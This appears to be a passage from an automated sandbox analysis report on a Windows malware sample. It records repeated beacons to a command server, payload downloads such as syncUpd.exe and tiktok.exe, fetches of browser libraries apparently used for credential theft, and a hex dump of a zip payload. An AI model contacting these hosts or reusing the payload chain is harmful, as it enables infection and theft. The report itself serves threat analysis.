Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228
Source: Joe Sandbox View	IP Address: 185.172.128.203 185.172.128.203

Source: Joe Sandbox View	ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: Joe Sandbox View	ASN Name: PINDC-ASRU PINDC-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Apr 2024 10:00:59 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
